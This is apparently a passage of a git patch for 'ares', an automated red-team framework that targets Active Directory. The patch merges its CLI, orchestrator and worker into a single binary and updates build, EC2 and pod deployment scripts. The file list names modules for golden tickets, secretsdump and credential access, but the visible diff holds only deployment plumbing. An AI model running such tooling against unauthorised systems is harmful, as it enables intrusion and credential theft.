From 13119f842d7fefb5d48c10838f0376934b98791e Mon Sep 17 00:00:00 2001 From: Jayson Grace Date: Fri, 17 Apr 2026 08:13:23 -0600 Subject: [PATCH 01/10] refactor: consolidate ares binaries into single 'ares' unified binary **Changed:** - Removed separate binaries for `ares-cli`, `ares-orchestrator`, and `ares-worker` in favor of a single unified `ares` binary with subcommands for CLI, orchestrator, and worker roles. - Updated all CI/CD workflows, Taskfiles, Ansible templates, and Docker/Warpgate build scripts to reference the new `ares` binary instead of the old split binaries. - Simplified build and deployment steps to only build and copy `ares` (no longer builds or distributes `ares-cli`, `ares-orchestrator`, or `ares-worker`). - Refactored Rust workspace and Cargo.toml to remove `ares-orchestrator` and `ares-worker` as separate workspace members; all orchestrator and worker logic now resides under the `ares` binary. - Updated all task references, systemd unit files, shell scripts, and documentation to use `ares` (and subcommands like `ares orchestrator`, `ares worker`, etc.) in place of the previous binaries. - Consolidated orchestrator, worker, and CLI logic into a single codebase with feature-flag-driven subcommand dispatch. - Refactored orchestrator and worker source directories and main entrypoints to support the unified binary model. - Updated all tool and inventory checks, agent registration, and heartbeat logic to use the new binary naming convention. - Modified all automation, exploitation, and result processing modules to support the new structure. **Removed:** - Deleted the `ares-orchestrator` and `ares-worker` workspace members and their Cargo.toml entries. - Removed all build, deploy, and packaging references to the split binaries from CI/CD, Warpgate, and container templates. - Eliminated duplicated orchestrator and worker entrypoints and binaries. - Removed `ares-orchestrator` and `ares-worker` installation and invocation logic from systemd unit files and EC2/k8s scripts. - Deprecated any split-binary invocation patterns in favor of the unified approach. --- .github/workflows/release.yaml | 2 +- .taskfiles/blue/Taskfile.yaml | 2 +- .taskfiles/ec2/Taskfile.yaml | 40 +- .../ec2/scripts/launch-orchestrator.sh.tmpl | 4 +- .taskfiles/ec2/scripts/setup.sh | 2 +- .taskfiles/ec2/scripts/status.sh | 2 +- .taskfiles/red/Taskfile.yaml | 2 +- .taskfiles/remote/Taskfile.yaml | 147 +--- .../remote/orchestrator-wrapper-patch.json | 2 +- .../remote/orchestrator-wrapper-patch.yaml | 6 +- .taskfiles/remote/orchestrator-wrapper.sh | 6 +- Cargo.lock | 48 +- Cargo.toml | 2 +- Taskfile.yaml | 4 +- ares-cli/Cargo.toml | 20 +- ares-cli/build.rs | 95 +++ ares-cli/src/cli/mod.rs | 10 +- ares-cli/src/main.rs | 10 +- ares-cli/src/orchestrator/automation/acl.rs | 149 ++++ ares-cli/src/orchestrator/automation/adcs.rs | 79 ++ .../src/orchestrator/automation/bloodhound.rs | 81 ++ .../src/orchestrator/automation/coercion.rs | 78 ++ ares-cli/src/orchestrator/automation/crack.rs | 75 ++ .../automation/credential_access.rs | 479 +++++++++++ .../automation/credential_expansion.rs | 410 ++++++++++ .../src/orchestrator/automation/delegation.rs | 103 +++ ares-cli/src/orchestrator/automation/gmsa.rs | 145 ++++ .../orchestrator/automation/golden_ticket.rs | 295 +++++++ ares-cli/src/orchestrator/automation/mod.rs | 64 ++ ares-cli/src/orchestrator/automation/mssql.rs | 94 +++ .../src/orchestrator/automation/refresh.rs | 32 + ares-cli/src/orchestrator/automation/s4u.rs | 354 +++++++++ .../orchestrator/automation/secretsdump.rs | 98 +++ .../src/orchestrator/automation/share_enum.rs | 106 +++ .../src/orchestrator/automation/shares.rs | 82 ++ .../automation/stall_detection.rs | 248 ++++++ ares-cli/src/orchestrator/automation/trust.rs | 448 +++++++++++ .../orchestrator/automation/unconstrained.rs | 385 +++++++++ .../src/orchestrator/automation_spawner.rs | 47 ++ ares-cli/src/orchestrator/blue/auto_submit.rs | 246 ++++++ ares-cli/src/orchestrator/blue/callbacks.rs | 621 +++++++++++++++ ares-cli/src/orchestrator/blue/chaining.rs | 598 ++++++++++++++ .../src/orchestrator/blue/investigation.rs | 570 +++++++++++++ ares-cli/src/orchestrator/blue/mod.rs | 19 + ares-cli/src/orchestrator/blue/runner.rs | 401 ++++++++++ ares-cli/src/orchestrator/blue/sub_agent.rs | 140 ++++ ares-cli/src/orchestrator/bootstrap.rs | 164 ++++ .../orchestrator/callback_handler/dispatch.rs | 251 ++++++ .../src/orchestrator/callback_handler/mod.rs | 111 +++ .../orchestrator/callback_handler/query.rs | 318 ++++++++ .../orchestrator/callback_handler/tests.rs | 547 +++++++++++++ ares-cli/src/orchestrator/completion.rs | 492 ++++++++++++ ares-cli/src/orchestrator/config.rs | 365 +++++++++ ares-cli/src/orchestrator/cost_summary.rs | 87 ++ ares-cli/src/orchestrator/deferred.rs | 395 +++++++++ ares-cli/src/orchestrator/dispatcher/mod.rs | 132 ++++ .../src/orchestrator/dispatcher/submission.rs | 450 +++++++++++ .../orchestrator/dispatcher/task_builders.rs | 463 +++++++++++ ares-cli/src/orchestrator/exploitation.rs | 196 +++++ ares-cli/src/orchestrator/llm_runner.rs | 372 +++++++++ ares-cli/src/orchestrator/mod.rs | 748 ++++++++++++++++++ ares-cli/src/orchestrator/monitoring.rs | 471 +++++++++++ .../orchestrator/output_extraction/hashes.rs | 308 ++++++++ .../orchestrator/output_extraction/hosts.rs | 108 +++ .../src/orchestrator/output_extraction/mod.rs | 160 ++++ .../output_extraction/passwords.rs | 178 +++++ .../orchestrator/output_extraction/shares.rs | 80 ++ .../orchestrator/output_extraction/tests.rs | 538 +++++++++++++ .../orchestrator/output_extraction/users.rs | 148 ++++ ares-cli/src/orchestrator/recovery/dedup.rs | 273 +++++++ ares-cli/src/orchestrator/recovery/manager.rs | 256 ++++++ ares-cli/src/orchestrator/recovery/mod.rs | 440 +++++++++++ .../src/orchestrator/recovery/normalize.rs | 171 ++++ ares-cli/src/orchestrator/recovery/requeue.rs | 59 ++ .../orchestrator/recovery/resume_helper.rs | 165 ++++ ares-cli/src/orchestrator/recovery/types.rs | 127 +++ .../result_processing/admin_checks.rs | 328 ++++++++ .../result_processing/discovery_polling.rs | 190 +++++ .../src/orchestrator/result_processing/mod.rs | 611 ++++++++++++++ .../orchestrator/result_processing/parsing.rs | 159 ++++ .../orchestrator/result_processing/tests.rs | 211 +++++ .../result_processing/timeline.rs | 100 +++ ares-cli/src/orchestrator/results.rs | 185 +++++ ares-cli/src/orchestrator/routing.rs | 258 ++++++ ares-cli/src/orchestrator/state/dedup.rs | 69 ++ ares-cli/src/orchestrator/state/inner.rs | 377 +++++++++ ares-cli/src/orchestrator/state/mod.rs | 75 ++ .../src/orchestrator/state/persistence.rs | 330 ++++++++ .../state/publishing/credentials.rs | 221 ++++++ .../orchestrator/state/publishing/entities.rs | 252 ++++++ .../orchestrator/state/publishing/hosts.rs | 342 ++++++++ .../state/publishing/milestones.rs | 156 ++++ .../src/orchestrator/state/publishing/mod.rs | 118 +++ ares-cli/src/orchestrator/state/shared.rs | 234 ++++++ ares-cli/src/orchestrator/task_queue.rs | 488 ++++++++++++ ares-cli/src/orchestrator/throttling.rs | 440 +++++++++++ .../tool_dispatcher/auth_throttle.rs | 88 +++ .../src/orchestrator/tool_dispatcher/local.rs | 91 +++ .../src/orchestrator/tool_dispatcher/mod.rs | 228 ++++++ .../tool_dispatcher/redis_dispatcher.rs | 165 ++++ .../src/orchestrator/tool_dispatcher/tests.rs | 98 +++ ares-cli/src/transport.rs | 8 +- ares-cli/src/worker/blue_task_loop.rs | 385 +++++++++ ares-cli/src/worker/config.rs | 199 +++++ ares-cli/src/worker/heartbeat.rs | 155 ++++ ares-cli/src/worker/hosts.rs | 238 ++++++ ares-cli/src/worker/mod.rs | 156 ++++ ares-cli/src/worker/task_loop/executor.rs | 415 ++++++++++ ares-cli/src/worker/task_loop/mod.rs | 236 ++++++ .../src/worker/task_loop/result_handler.rs | 215 +++++ ares-cli/src/worker/task_loop/types.rs | 180 +++++ ares-cli/src/worker/tool_check.rs | 273 +++++++ ares-cli/src/worker/tool_executor.rs | 452 +++++++++++ .../templates/ares-acl-agent/warpgate.yaml | 4 +- .../templates/ares-blue-agent/warpgate.yaml | 6 +- .../warpgate.yaml | 6 +- .../warpgate.yaml | 6 +- .../ares-blue-triage-agent/warpgate.yaml | 6 +- .../templates/ares-cli/warpgate.yaml | 6 +- .../ares-coercion-agent/warpgate.yaml | 4 +- .../ares-cracker-agent-gpu/warpgate.yaml | 4 +- .../ares-cracker-agent/warpgate.yaml | 4 +- .../warpgate.yaml | 4 +- .../ares-lateral-movement-agent/warpgate.yaml | 4 +- .../templates/ares-orchestrator/warpgate.yaml | 6 +- .../ares-privesc-agent/warpgate.yaml | 4 +- .../templates/ares-recon-agent/warpgate.yaml | 4 +- .../templates/ares-worker/warpgate.yaml | 6 +- 128 files changed, 23988 insertions(+), 236 deletions(-) create mode 100644 ares-cli/build.rs create mode 100644 ares-cli/src/orchestrator/automation/acl.rs create mode 100644 ares-cli/src/orchestrator/automation/adcs.rs create mode 100644 ares-cli/src/orchestrator/automation/bloodhound.rs create mode 100644 ares-cli/src/orchestrator/automation/coercion.rs create mode 100644 ares-cli/src/orchestrator/automation/crack.rs create mode 100644 ares-cli/src/orchestrator/automation/credential_access.rs create mode 100644 ares-cli/src/orchestrator/automation/credential_expansion.rs create mode 100644 ares-cli/src/orchestrator/automation/delegation.rs create mode 100644 ares-cli/src/orchestrator/automation/gmsa.rs create mode 100644 ares-cli/src/orchestrator/automation/golden_ticket.rs create mode 100644 ares-cli/src/orchestrator/automation/mod.rs create mode 100644 ares-cli/src/orchestrator/automation/mssql.rs create mode 100644 ares-cli/src/orchestrator/automation/refresh.rs create mode 100644 ares-cli/src/orchestrator/automation/s4u.rs create mode 100644 ares-cli/src/orchestrator/automation/secretsdump.rs create mode 100644 ares-cli/src/orchestrator/automation/share_enum.rs create mode 100644 ares-cli/src/orchestrator/automation/shares.rs create mode 100644 ares-cli/src/orchestrator/automation/stall_detection.rs create mode 100644 ares-cli/src/orchestrator/automation/trust.rs create mode 100644 ares-cli/src/orchestrator/automation/unconstrained.rs create mode 100644 ares-cli/src/orchestrator/automation_spawner.rs create mode 100644 ares-cli/src/orchestrator/blue/auto_submit.rs create mode 100644 ares-cli/src/orchestrator/blue/callbacks.rs create mode 100644 ares-cli/src/orchestrator/blue/chaining.rs create mode 100644 ares-cli/src/orchestrator/blue/investigation.rs create mode 100644 ares-cli/src/orchestrator/blue/mod.rs create mode 100644 ares-cli/src/orchestrator/blue/runner.rs create mode 100644 ares-cli/src/orchestrator/blue/sub_agent.rs create mode 100644 ares-cli/src/orchestrator/bootstrap.rs create mode 100644 ares-cli/src/orchestrator/callback_handler/dispatch.rs create mode 100644 ares-cli/src/orchestrator/callback_handler/mod.rs create mode 100644 ares-cli/src/orchestrator/callback_handler/query.rs create mode 100644 ares-cli/src/orchestrator/callback_handler/tests.rs create mode 100644 ares-cli/src/orchestrator/completion.rs create mode 100644 ares-cli/src/orchestrator/config.rs create mode 100644 ares-cli/src/orchestrator/cost_summary.rs create mode 100644 ares-cli/src/orchestrator/deferred.rs create mode 100644 ares-cli/src/orchestrator/dispatcher/mod.rs create mode 100644 ares-cli/src/orchestrator/dispatcher/submission.rs create mode 100644 ares-cli/src/orchestrator/dispatcher/task_builders.rs create mode 100644 ares-cli/src/orchestrator/exploitation.rs create mode 100644 ares-cli/src/orchestrator/llm_runner.rs create mode 100644 ares-cli/src/orchestrator/mod.rs create mode 100644 ares-cli/src/orchestrator/monitoring.rs create mode 100644 ares-cli/src/orchestrator/output_extraction/hashes.rs create mode 100644 ares-cli/src/orchestrator/output_extraction/hosts.rs create mode 100644 ares-cli/src/orchestrator/output_extraction/mod.rs create mode 100644 ares-cli/src/orchestrator/output_extraction/passwords.rs create mode 100644 ares-cli/src/orchestrator/output_extraction/shares.rs create mode 100644 ares-cli/src/orchestrator/output_extraction/tests.rs create mode 100644 ares-cli/src/orchestrator/output_extraction/users.rs create mode 100644 ares-cli/src/orchestrator/recovery/dedup.rs create mode 100644 ares-cli/src/orchestrator/recovery/manager.rs create mode 100644 ares-cli/src/orchestrator/recovery/mod.rs create mode 100644 ares-cli/src/orchestrator/recovery/normalize.rs create mode 100644 ares-cli/src/orchestrator/recovery/requeue.rs create mode 100644 ares-cli/src/orchestrator/recovery/resume_helper.rs create mode 100644 ares-cli/src/orchestrator/recovery/types.rs create mode 100644 ares-cli/src/orchestrator/result_processing/admin_checks.rs create mode 100644 ares-cli/src/orchestrator/result_processing/discovery_polling.rs create mode 100644 ares-cli/src/orchestrator/result_processing/mod.rs create mode 100644 ares-cli/src/orchestrator/result_processing/parsing.rs create mode 100644 ares-cli/src/orchestrator/result_processing/tests.rs create mode 100644 ares-cli/src/orchestrator/result_processing/timeline.rs create mode 100644 ares-cli/src/orchestrator/results.rs create mode 100644 ares-cli/src/orchestrator/routing.rs create mode 100644 ares-cli/src/orchestrator/state/dedup.rs create mode 100644 ares-cli/src/orchestrator/state/inner.rs create mode 100644 ares-cli/src/orchestrator/state/mod.rs create mode 100644 ares-cli/src/orchestrator/state/persistence.rs create mode 100644 ares-cli/src/orchestrator/state/publishing/credentials.rs create mode 100644 ares-cli/src/orchestrator/state/publishing/entities.rs create mode 100644 ares-cli/src/orchestrator/state/publishing/hosts.rs create mode 100644 ares-cli/src/orchestrator/state/publishing/milestones.rs create mode 100644 ares-cli/src/orchestrator/state/publishing/mod.rs create mode 100644 ares-cli/src/orchestrator/state/shared.rs create mode 100644 ares-cli/src/orchestrator/task_queue.rs create mode 100644 ares-cli/src/orchestrator/throttling.rs create mode 100644 ares-cli/src/orchestrator/tool_dispatcher/auth_throttle.rs create mode 100644 ares-cli/src/orchestrator/tool_dispatcher/local.rs create mode 100644 ares-cli/src/orchestrator/tool_dispatcher/mod.rs create mode 100644 ares-cli/src/orchestrator/tool_dispatcher/redis_dispatcher.rs create mode 100644 ares-cli/src/orchestrator/tool_dispatcher/tests.rs create mode 100644 ares-cli/src/worker/blue_task_loop.rs create mode 100644 ares-cli/src/worker/config.rs create mode 100644 ares-cli/src/worker/heartbeat.rs create mode 100644 ares-cli/src/worker/hosts.rs create mode 100644 ares-cli/src/worker/mod.rs create mode 100644 ares-cli/src/worker/task_loop/executor.rs create mode 100644 ares-cli/src/worker/task_loop/mod.rs create mode 100644 ares-cli/src/worker/task_loop/result_handler.rs create mode 100644 ares-cli/src/worker/task_loop/types.rs create mode 100644 ares-cli/src/worker/tool_check.rs create mode 100644 ares-cli/src/worker/tool_executor.rs diff --git a/.github/workflows/release.yaml b/.github/workflows/release.yaml index 0e28751b..4996ac6a 100644 --- a/.github/workflows/release.yaml +++ b/.github/workflows/release.yaml @@ -72,7 +72,7 @@ jobs: shell: bash run: | TAG="${GITHUB_REF#refs/tags/}" - BINS=("ares-cli" "ares-orchestrator" "ares-worker") + BINS=("ares") for bin in "${BINS[@]}"; do ARCHIVE="${bin}-${TAG}-${{ matrix.target }}" diff --git a/.taskfiles/blue/Taskfile.yaml b/.taskfiles/blue/Taskfile.yaml index 0431648a..9c65fb01 100644 --- a/.taskfiles/blue/Taskfile.yaml +++ b/.taskfiles/blue/Taskfile.yaml @@ -4,7 +4,7 @@ version: "3" vars: # Rust CLI binary path (passed from parent Taskfile) - ARES_CLI: '{{.ARES_CLI | default "./target/release/ares-cli"}}' + ARES_CLI: '{{.ARES_CLI | default "./target/release/ares"}}' # AWS defaults for Grafana access PROFILE: '{{.PROFILE | default "infrastructure"}}' REGION: '{{.REGION | default "us-west-2"}}' diff --git a/.taskfiles/ec2/Taskfile.yaml b/.taskfiles/ec2/Taskfile.yaml index 1ee52e28..4e0e6ca1 100644 --- a/.taskfiles/ec2/Taskfile.yaml +++ b/.taskfiles/ec2/Taskfile.yaml @@ -157,9 +157,9 @@ tasks: "mkdir -p " + $build_dir, "aws s3 cp s3://" + $bucket + "/" + $prefix + "/ares-src.tar.gz /tmp/ares-src.tar.gz", "tar -xzf /tmp/ares-src.tar.gz -C " + $build_dir, - "cd " + $build_dir + " && CARGO_TARGET_X86_64_UNKNOWN_LINUX_GNU_LINKER=gcc cargo build --release -p ares-cli -p ares-orchestrator -p ares-worker 2>&1", - "for bin in ares-cli ares-orchestrator ares-worker; do cp " + $build_dir + "/target/release/$bin /usr/local/bin/$bin && chmod +x /usr/local/bin/$bin; done", - "echo Deployed: && ls -lh /usr/local/bin/ares-cli /usr/local/bin/ares-orchestrator /usr/local/bin/ares-worker" + "cd " + $build_dir + " && CARGO_TARGET_X86_64_UNKNOWN_LINUX_GNU_LINKER=gcc cargo build --release -p ares-cli 2>&1", + "cp " + $build_dir + "/target/release/ares /usr/local/bin/ares && chmod +x /usr/local/bin/ares", + "echo Deployed: && ls -lh /usr/local/bin/ares" ]}' > "$PARAMS_FILE" CMD_ID=$(aws ssm send-command \ @@ -227,9 +227,7 @@ tasks: cross build --release --target {{.RUST_TARGET}} -j "{{.CARGO_BUILD_JOBS}}" ;; zigbuild) - for pkg in ares-cli ares-orchestrator ares-worker; do - cargo zigbuild --release --target {{.RUST_TARGET}} -j "{{.CARGO_BUILD_JOBS}}" -p $pkg - done + cargo zigbuild --release --target {{.RUST_TARGET}} -j "{{.CARGO_BUILD_JOBS}}" -p ares-cli ;; cargo) echo -e "{{.WARN}} Using plain cargo (no cross-compilation toolchain)..." @@ -241,8 +239,8 @@ tasks: ;; esac - echo -e "{{.SUCCESS}} Binaries built:" - ls -lh {{.BIN_DIR}}/ares-cli {{.BIN_DIR}}/ares-orchestrator {{.BIN_DIR}}/ares-worker 2>/dev/null || true + echo -e "{{.SUCCESS}} Binary built:" + ls -lh {{.BIN_DIR}}/ares 2>/dev/null || true # Upload to S3 staging (skip for remote builds) - | @@ -250,7 +248,7 @@ tasks: echo -e "{{.INFO}} Uploading binaries to s3://{{.BCP_BUCKET}}/{{.S3_DEPLOY_PREFIX}}/..." - for bin in ares-cli ares-orchestrator ares-worker; do + for bin in ares; do aws s3 cp "{{.BIN_DIR}}/$bin" "s3://{{.BCP_BUCKET}}/{{.S3_DEPLOY_PREFIX}}/$bin" \ --profile "{{.EC2_PROFILE}}" --region "{{.EC2_REGION}}" done @@ -279,7 +277,7 @@ tasks: PARAMS_FILE=$(mktemp) trap "rm -f $PARAMS_FILE" EXIT jq -n --arg bucket "{{.BCP_BUCKET}}" --arg prefix "{{.S3_DEPLOY_PREFIX}}" \ - '{"commands": ["set -e; for bin in ares-cli ares-orchestrator ares-worker; do aws s3 cp s3://" + $bucket + "/" + $prefix + "/$bin /usr/local/bin/$bin; chmod +x /usr/local/bin/$bin; done; echo Deployed:; ls -lh /usr/local/bin/ares-*"]}' \ + '{"commands": ["set -e; aws s3 cp s3://" + $bucket + "/" + $prefix + "/ares /usr/local/bin/ares; chmod +x /usr/local/bin/ares; echo Deployed:; ls -lh /usr/local/bin/ares"]}' \ > "$PARAMS_FILE" CMD_ID=$(aws ssm send-command \ @@ -586,7 +584,7 @@ tasks: PARAMS_FILE=$(mktemp) trap "rm -f $PARAMS_FILE" EXIT - jq -n --arg units "$WORKER_UNITS" '{"commands": ["systemctl stop " + $units + " 2>/dev/null || true; pkill -f ares-orchestrator 2>/dev/null || true; echo Stopped all ares workers and orchestrator"]}' > "$PARAMS_FILE" + jq -n --arg units "$WORKER_UNITS" '{"commands": ["systemctl stop " + $units + " 2>/dev/null || true; pkill -f '\\''ares orchestrator'\\'' 2>/dev/null || true; echo Stopped all ares workers and orchestrator"]}' > "$PARAMS_FILE" CMD_ID=$(aws ssm send-command \ --profile "{{.EC2_PROFILE}}" \ @@ -628,7 +626,7 @@ tasks: - sh: '[ -n "{{.OPERATION_ID}}" ] || [ "{{.LATEST}}" = "true" ]' msg: "Provide OPERATION_ID=op-xxx or LATEST=true" cmd: >- - ares-cli --ec2 {{.EC2_NAME}} --ec2-profile {{.EC2_PROFILE}} --ec2-region {{.EC2_REGION}} + ares --ec2 {{.EC2_NAME}} --ec2-profile {{.EC2_PROFILE}} --ec2-region {{.EC2_REGION}} ops stop {{if ne .OPERATION_ID ""}}{{.OPERATION_ID}}{{end}} {{if eq .LATEST "true"}}--latest{{end}} @@ -750,7 +748,7 @@ tasks: sleep 1 echo -e "{{.INFO}} Port-forwarding Redis: localhost:16379 -> $INSTANCE_ID:6379" - echo -e "{{.INFO}} Use: ARES_REDIS_URL=redis://localhost:16379 ares-cli ops loot --latest" + echo -e "{{.INFO}} Use: ARES_REDIS_URL=redis://localhost:16379 ares ops loot --latest" echo -e "{{.INFO}} Press Ctrl+C to stop" echo "" @@ -763,7 +761,7 @@ tasks: # ============================================================================ # CLI Operations (loot, runtime, report, list) - # These use `ares-cli --ec2` which handles instance resolution and SSM. + # These use `ares --ec2` which handles instance resolution and SSM. # ============================================================================ loot: desc: "Dump loot from EC2 via SSM (usage: task ec2:loot [EC2_NAME=ares-tools] [LATEST=true] [OPERATION_ID=op-xxx] [JSON=false] [DIFF=false])" @@ -774,7 +772,7 @@ tasks: JSON: '{{.JSON | default "false"}}' DIFF: '{{.DIFF | default "false"}}' cmd: >- - ares-cli --ec2 {{.EC2_NAME}} --ec2-profile {{.EC2_PROFILE}} --ec2-region {{.EC2_REGION}} + ares --ec2 {{.EC2_NAME}} --ec2-profile {{.EC2_PROFILE}} --ec2-region {{.EC2_REGION}} ops loot {{if ne .OPERATION_ID ""}}{{.OPERATION_ID}}{{end}} {{if eq .LATEST "true"}}--latest{{end}} @@ -788,7 +786,7 @@ tasks: OPERATION_ID: '{{.OPERATION_ID | default ""}}' LATEST: '{{.LATEST | default "true"}}' cmd: >- - ares-cli --ec2 {{.EC2_NAME}} --ec2-profile {{.EC2_PROFILE}} --ec2-region {{.EC2_REGION}} + ares --ec2 {{.EC2_NAME}} --ec2-profile {{.EC2_PROFILE}} --ec2-region {{.EC2_REGION}} ops runtime {{if ne .OPERATION_ID ""}}{{.OPERATION_ID}}{{end}} {{if eq .LATEST "true"}}--latest{{end}} @@ -817,7 +815,7 @@ tasks: fi # Step 1: Generate report on EC2 and get the operation ID + report content - REPORT_CMD="set -e; RUST_LOG=error ares-cli ops report" + REPORT_CMD="set -e; RUST_LOG=error ares ops report" {{if ne .OPERATION_ID ""}}REPORT_CMD="$REPORT_CMD {{.OPERATION_ID}}"{{end}} {{if eq .LATEST "true"}}REPORT_CMD="$REPORT_CMD --latest"{{end}} {{if eq .REGENERATE "true"}}REPORT_CMD="$REPORT_CMD --regenerate"{{end}} @@ -907,7 +905,7 @@ tasks: vars: LATEST: '{{.LATEST | default "false"}}' cmd: >- - ares-cli --ec2 {{.EC2_NAME}} --ec2-profile {{.EC2_PROFILE}} --ec2-region {{.EC2_REGION}} + ares --ec2 {{.EC2_NAME}} --ec2-profile {{.EC2_PROFILE}} --ec2-region {{.EC2_REGION}} ops list {{if eq .LATEST "true"}}--latest{{end}} @@ -1010,7 +1008,7 @@ tasks: set -e ${ENV_FILE_CMD} ${FLUSH_CMD} - pkill -f ares-orchestrator 2>/dev/null || true; sleep 1 + pkill -f 'ares orchestrator' 2>/dev/null || true; sleep 1 export OPENAI_API_KEY='${OPENAI_KEY}' export ANTHROPIC_API_KEY='${ANTHROPIC_KEY}' export GRAFANA_URL='${GRAFANA_URL_VAL}' @@ -1030,9 +1028,9 @@ tasks: export OTEL_RESOURCE_ATTRIBUTES='deployment.environment=staging,attack.team=red' export ARES_OPERATION_ID='${PAYLOAD}' mkdir -p {{.ARES_LOG_DIR}} - nohup /usr/local/bin/ares-orchestrator >{{.ARES_LOG_DIR}}/orchestrator.log 2>&1 & + nohup /usr/local/bin/ares orchestrator >{{.ARES_LOG_DIR}}/orchestrator.log 2>&1 & sleep 2 - if pgrep -f ares-orchestrator >/dev/null; then + if pgrep -f 'ares orchestrator' >/dev/null; then echo Orchestrator started for ${OP_ID} head -5 {{.ARES_LOG_DIR}}/orchestrator.log else diff --git a/.taskfiles/ec2/scripts/launch-orchestrator.sh.tmpl b/.taskfiles/ec2/scripts/launch-orchestrator.sh.tmpl index fe458944..cf671c24 100755 --- a/.taskfiles/ec2/scripts/launch-orchestrator.sh.tmpl +++ b/.taskfiles/ec2/scripts/launch-orchestrator.sh.tmpl @@ -29,7 +29,7 @@ export OTEL_EXPORTER_OTLP_TRACES_ENDPOINT='__OTEL_TRACES_ENDPOINT__' export OTEL_EXPORTER_OTLP_PROTOCOL='http/protobuf' export OTEL_EXPORTER_OTLP_HEADERS='X-Api-Key=__DREADNODE_API_KEY__' export OTEL_RESOURCE_ATTRIBUTES='deployment.environment=staging,attack.team=red' -pkill -f ares-orchestrator 2>/dev/null || true +pkill -f 'ares orchestrator' 2>/dev/null || true sleep 1 -nohup /usr/local/bin/ares-orchestrator >/var/log/ares/orchestrator.log 2>&1 & +nohup /usr/local/bin/ares orchestrator >/var/log/ares/orchestrator.log 2>&1 & echo "Orchestrator started (PID: $!)" diff --git a/.taskfiles/ec2/scripts/setup.sh b/.taskfiles/ec2/scripts/setup.sh index 45ead339..924522c0 100755 --- a/.taskfiles/ec2/scripts/setup.sh +++ b/.taskfiles/ec2/scripts/setup.sh @@ -30,7 +30,7 @@ Wants=redis.service [Service] Type=simple -ExecStart=/usr/local/bin/ares-worker +ExecStart=/usr/local/bin/ares worker EnvironmentFile=-/etc/ares/env Environment=ARES_REDIS_URL=redis://127.0.0.1:6379 Environment=ARES_WORKER_ROLE=%i diff --git a/.taskfiles/ec2/scripts/status.sh b/.taskfiles/ec2/scripts/status.sh index e5e0f250..03472831 100755 --- a/.taskfiles/ec2/scripts/status.sh +++ b/.taskfiles/ec2/scripts/status.sh @@ -17,7 +17,7 @@ done echo "" echo "=== Orchestrator ===" -ORCH_PID=$(pgrep -f ares-orchestrator 2>/dev/null || true) +ORCH_PID=$(pgrep -f 'ares orchestrator' 2>/dev/null || true) if [ -n "$ORCH_PID" ]; then echo " Running (PID: $ORCH_PID)" ps -p "$ORCH_PID" -o etime=,args= 2>/dev/null | head -1 diff --git a/.taskfiles/red/Taskfile.yaml b/.taskfiles/red/Taskfile.yaml index 064b10b8..2f95e820 100644 --- a/.taskfiles/red/Taskfile.yaml +++ b/.taskfiles/red/Taskfile.yaml @@ -9,7 +9,7 @@ shopt: [globstar] vars: # Rust CLI binary path (passed from parent Taskfile) - ARES_CLI: '{{.ARES_CLI | default "./target/release/ares-cli"}}' + ARES_CLI: '{{.ARES_CLI | default "./target/release/ares"}}' # Remote paths (local to this taskfile) REMOTE_REPORT_DIR: '{{.REMOTE_REPORT_DIR | default "/reports"}}' diff --git a/.taskfiles/remote/Taskfile.yaml b/.taskfiles/remote/Taskfile.yaml index 0725b9fb..dce4f16f 100644 --- a/.taskfiles/remote/Taskfile.yaml +++ b/.taskfiles/remote/Taskfile.yaml @@ -900,10 +900,8 @@ tasks: cargo build --release --target {{.RUST_TARGET}} fi - echo -e "{{.SUCCESS}} Binaries built:" - ls -lh target/{{.RUST_TARGET}}/release/ares-cli \ - target/{{.RUST_TARGET}}/release/ares-orchestrator \ - target/{{.RUST_TARGET}}/release/ares-worker 2>/dev/null || true + echo -e "{{.SUCCESS}} Binary built:" + ls -lh target/{{.RUST_TARGET}}/release/ares 2>/dev/null || true EOF orchestrator:patch-wrapper: @@ -932,18 +930,9 @@ tasks: echo -e "{{.INFO}} Comparing local Rust binaries to remote pods (team={{.TEAM}})" echo "" - # Check local binaries exist - LOCAL_BINS_FOUND=0 - for bin in ares-cli ares-orchestrator ares-worker; do - if [ -f "{{.BIN_DIR}}/$bin" ]; then - LOCAL_BINS_FOUND=$((LOCAL_BINS_FOUND + 1)) - else - echo -e "{{.WARN}} Local binary not found: {{.BIN_DIR}}/$bin" - fi - done - - if [ $LOCAL_BINS_FOUND -eq 0 ]; then - echo -e "{{.ERROR}} No local binaries found. Run: task remote:rust:build" + # Check local binary exists + if [ ! -f "{{.BIN_DIR}}/ares" ]; then + echo -e "{{.ERROR}} Local binary not found: {{.BIN_DIR}}/ares. Run: task remote:rust:build" exit 1 fi @@ -1016,59 +1005,32 @@ tasks: fi } - # Check orchestrator pods: ares-cli + ares-orchestrator - for pod in $ORCH_PODS; do - for bin in ares-cli ares-orchestrator; do - [ ! -f "{{.BIN_DIR}}/$bin" ] && continue - local_hash=$(shasum -a 256 "{{.BIN_DIR}}/$bin" | awk '{print $1}') - TOTAL_CHECKED=$((TOTAL_CHECKED + 1)) - - result=$(check_binary "$bin" "$pod" "$local_hash") - case "$result" in - OK) - echo -e "{{.SUCCESS}} $bin @ $pod: OK" - TOTAL_MATCH=$((TOTAL_MATCH + 1)) - ;; - MISSING) - echo -e "{{.WARN}} $bin @ $pod: MISSING" - TOTAL_MISSING=$((TOTAL_MISSING + 1)) - echo "$FAILED_PODS" | grep -q "$pod" || FAILED_PODS="$FAILED_PODS $pod" - ;; - DIFFERS) - echo -e "{{.ERROR}} $bin @ $pod: DIFFERS" - TOTAL_DIFFER=$((TOTAL_DIFFER + 1)) - echo "$FAILED_PODS" | grep -q "$pod" || FAILED_PODS="$FAILED_PODS $pod" - ;; - esac - done + # Check all pods: single ares binary + local_hash=$(shasum -a 256 "{{.BIN_DIR}}/ares" | awk '{print $1}') + ALL_PODS="$ORCH_PODS $WORKER_PODS" + for pod in $ALL_PODS; do + [ -z "$pod" ] && continue + TOTAL_CHECKED=$((TOTAL_CHECKED + 1)) + + result=$(check_binary "ares" "$pod" "$local_hash") + case "$result" in + OK) + echo -e "{{.SUCCESS}} ares @ $pod: OK" + TOTAL_MATCH=$((TOTAL_MATCH + 1)) + ;; + MISSING) + echo -e "{{.WARN}} ares @ $pod: MISSING" + TOTAL_MISSING=$((TOTAL_MISSING + 1)) + echo "$FAILED_PODS" | grep -q "$pod" || FAILED_PODS="$FAILED_PODS $pod" + ;; + DIFFERS) + echo -e "{{.ERROR}} ares @ $pod: DIFFERS" + TOTAL_DIFFER=$((TOTAL_DIFFER + 1)) + echo "$FAILED_PODS" | grep -q "$pod" || FAILED_PODS="$FAILED_PODS $pod" + ;; + esac done - # Check worker pods: ares-worker only - if [ -n 